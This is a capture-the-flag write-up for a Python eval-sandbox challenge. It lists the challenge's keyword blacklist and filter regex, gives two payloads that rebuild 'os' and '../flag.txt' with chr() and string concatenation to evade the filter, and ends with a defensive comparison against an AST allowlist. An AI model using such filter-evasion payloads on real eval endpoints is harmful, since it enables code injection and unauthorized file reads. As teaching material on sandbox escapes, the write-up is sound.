3v@l

Blacklisted words: os,eval,exec,bind,connect,python,socket,ls,cat,shell,bind

Regex to bypass: r'0x[0-9A-Fa-f]+|\\u[0-9A-Fa-f]{4}|%[0-9A-Fa-f]{2}|\.[A-Za-z0-9]{1,3}\b|[\\\/]|\.\.'

  • 0x[0-9A-Fa-f]+: Hexadecimal numbers prefixed with 0x
  • \\u[0-9A-Fa-f]{4} : Unicode escape sequences in the \uXXXX format
  • %[0-9A-Fa-f]{2} : URL-encoded characters in the %XX format
  • \.[A-Za-z0-9]{1,3}\b : File extensions of 1 to 3 alphanumeric characters preceded by a dot
  • [\\\/] : Backslash or forward slash
  • \.\. : Two consecutive literal dots (..)

Payloads that get past both filters (the comment under each shows what it evaluates to):

__import__(chr(111)+chr(115)).listdir('.'+'.')
# os.listdir('..')
open('.'+'.'+chr(47)+'flag.'+'txt').read()
# open('../flag.txt').read()
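
Why a text-level filter misses these inputs, as an added example (not code from the challenge): it reconstructs the blacklist and regex from the lists above, assuming the blacklist is a plain substring match, and compares the result with a hypothetical AST allowlist (`allowlist_allows`) that accepts only arithmetic on numbers.

```python
import ast
import re

# Reconstructed from the lists on this page; substring matching is an assumption.
BLACKLIST = ["os", "eval", "exec", "bind", "connect", "python", "socket", "ls", "cat", "shell"]
PATTERN = re.compile(
    r'0x[0-9A-Fa-f]+|\\u[0-9A-Fa-f]{4}|%[0-9A-Fa-f]{2}'
    r'|\.[A-Za-z0-9]{1,3}\b|[\\\/]|\.\.'
)

def denylist_allows(code: str) -> bool:
    """True when neither the word blacklist nor the regex matches the raw text."""
    if any(word in code for word in BLACKLIST):
        return False
    return PATTERN.search(code) is None

# Hypothetical hardened check: allow only numeric constants and basic arithmetic.
ALLOWED_NODES = (
    ast.Expression, ast.BinOp, ast.UnaryOp, ast.Constant,
    ast.Add, ast.Sub, ast.Mult, ast.Div, ast.Mod,
    ast.USub, ast.UAdd,
)

def allowlist_allows(code: str) -> bool:
    """True only if every node in the parsed expression is on the allowlist."""
    try:
        tree = ast.parse(code, mode="eval")
    except SyntaxError:
        return False
    for node in ast.walk(tree):
        if not isinstance(node, ALLOWED_NODES):
            return False  # calls, names, attributes, subscripts, ...
        if isinstance(node, ast.Constant) and type(node.value) not in (int, float):
            return False  # strings can be concatenated into anything
    return True

# The two payloads from this page, plus a constructed benign input.
PAYLOADS = [
    "__import__(chr(111)+chr(115)).listdir('.'+'.')",
    "open('.'+'.'+chr(47)+'flag.'+'txt').read()",
]
BENIGN = "(2 + 3) * 7"

if __name__ == "__main__":
    for src in PAYLOADS + [BENIGN]:
        print(f"{src!r}: denylist={denylist_allows(src)} allowlist={allowlist_allows(src)}")
```

The denylist inspects characters before evaluation, while `chr()` and string concatenation build the forbidden names and paths at run time; the allowlist rejects the `Call` and `Name` nodes that make that construction possible.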